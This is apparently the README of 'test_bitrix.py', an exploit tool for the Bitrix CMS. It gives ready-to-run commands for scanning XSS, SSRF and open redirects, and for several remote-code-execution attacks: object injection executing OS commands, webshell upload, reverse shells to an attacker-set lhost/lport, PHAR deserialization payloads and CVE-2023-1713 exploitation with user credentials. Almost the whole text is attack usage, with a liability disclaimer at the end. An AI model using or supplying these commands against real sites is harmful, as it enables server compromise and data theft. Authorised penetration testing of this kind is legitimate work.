Table of Contents
This script scans common Bitrix vulnerabilities:
- exposed login pages;
- exposed register pages;
- pages that contain errors;
- admin panels;
- content spoofing;
- open redirect;
- reflected xss;
- stored xss via file upload (works only with Apache);
- ssrf.
You can also separately check following RCE vulnerabilities:
- object injection (RCE "html_editor_action")
- vote (webshell, reverse shell, phar, .htaccess)
- insecure temporary file creation (CVE-2023-1713).
python3 test_bitrix.py -hThis will display help for the tool
usage: python3 test_bitrix.py [-h] -t TARGET [-x proxy] {scan,rce_vote,vote_phar,vote_htaccess,object_injection,tmp_file_create} ...
positional arguments:
{scan,rce_vote,vote_phar,vote_htaccess,object_injection,tmp_file_create}
scan Scan mode
rce_vote RCE vote mode
vote_phar RCE vote phar deserialize mode (Exploit Nginx or Apache setup using PHAR deserialization)
vote_htaccess RCE vote using .htaccess mode (Exploit Apache setup using .htaccess and shell upload)
object_injection RCE object injection mode
tmp_file_create RCE via Insecure Temporary File Creation CVE-2023-1713 (It works only with Apache. The .htaccess file is required to be present in the same directory as the Python3 exploit code). Need any valid set of
credentials (regardless of privileges)
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
target url (example: https://target.com) (default: None)
-x proxy, --proxy proxy
URL proxy (example: http://127.0.0.1:8080) (default: None)Scan common vulnerabilities
python3 test_bitrix.py -t https://example.com scan -s http://subdomain.oastify.comDisplay help for mode
python3 test_bitrix.py scan -husage: python3 test_bitrix.py scan [-h] -s SSRF_URL
options:
-h, --help show this help message and exit
-s SSRF_URL, --ssrf_url SSRF_URL
url for ssrf attack (example: http://5kqki2fsl626q2257vy6xc2ef5lw9rxg.oastify.com)python3 test_bitrix.py -t https://example.com object_injection -c 'whoami'Display help for mode
python3 test_bitrix.py object_injection -husage: python3 test_bitrix.py object_injection [-h] [-f FUNCTION] -c COMMAND
options:
-h, --help show this help message and exit
-f FUNCTION, --function FUNCTION
Used function
-c COMMAND, --command COMMAND
Command for executionWebshell
python3 test_bitrix.py -t https://example.com rce_vote --web-shell trueReverse shell
python3 test_bitrix.py -t https://example.com rce_vote --lhost 192.168.1.1 --lport 8001Display help for mode
python3 test_bitrix.py rce_vote -husage: python3 test_bitrix.py rce_vote [-h] [--id_agent ID_AGENT] [--lhost LHOST] [--lport LPORT] [--web-shell webshell] [--path path]
options:
-h, --help show this help message and exit
--id_agent ID_AGENT ID of vote module agent (2, 4 and 7 available)
--lhost LHOST IP address for reverse connection
--lport LPORT Port of the host that listens for reverse connection
--web-shell webshell Use web shell instead of console reverse shell
--path path Path where in the site to upload a random file (example: /upload/iblock/1d3/)
Prepare webshell page for a payload. The payload must not be .php. The webshell may be taken from here just save it as html
python3 test_bitrix.py -t https://example.com vote_htaccess -p shell.htmlDisplay help for mode
python3 test_bitrix.py vote_htaccess -husage: python3 test_bitrix.py vote_htaccess [-h] -p payload
options:
-h, --help show this help message and exit
-p payload, --payload payload
Path to payload fileGenerate phar payload file with php script
php -d phar.readonly=0 gadgets.php rce1 system '<os command here>' payload.pharUse it as payload here
python3 test_bitrix.py -t https://example.com vote_phar -p payload.pharDisplay help for mode
python3 test_bitrix.py vote_phar -husage: python3 test_bitrix.py vote_phar [-h] -p payload
options:
-h, --help show this help message and exit
-p payload, --payload payload
Path to payload file
It works only with Apache. The .htaccess file is required to be present in the same directory as the Python3 exploit code.
Get user credentials regardless of privileges. Point out the login page in the parameter -r, port of the host that listens for web connection --lport1, port of the host that listens for reverse shell connection --lport2
python3 test_bitrix.py -t https://example.com tmp_file_create -r bitrix/components/bitrix/map.yandex.search/settings/settings.php?login=yes -l user -p 123456 --lhost 192.168.1.11 --lport1 8001 --lport2 9001Create file cached-creds.txt in the same directory as the python script code, and write down PHPSESSID:sessid value, then run the command below
python3 test_bitrix.py -t https://example.com tmp_file_create --lhost 192.168.1.11 --lport1 8001 --lport2 9001Display help for mode
python3 test_bitrix.py tmp_file_create -husage: python3 test_bitrix.py tmp_file_create [-h] [-r PATH_LOGIN] [-l LOGIN] [-p PASSWORD] --lhost LHOST --lport1 LPORT1 --lport2 LPORT2 [-d DELAY_SECONDS] [-n N_REPS] [-i SITE_ID]
options:
-h, --help show this help message and exit
-r PATH_LOGIN, --path_login PATH_LOGIN
Url path for login
-l LOGIN, --login LOGIN
User login
-p PASSWORD, --password PASSWORD
User password
--lhost LHOST IP address for reverse connection
--lport1 LPORT1 Port of the host that listens for web connection
--lport2 LPORT2 Port of the host that listens for reverse shell connection
-d DELAY_SECONDS, --delay_seconds DELAY_SECONDS
Delay the deletion of uploaded files
-n N_REPS, --n_reps N_REPS
Number of replicated files
-i SITE_ID, --site_id SITE_ID
Site idUsage of this tool for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.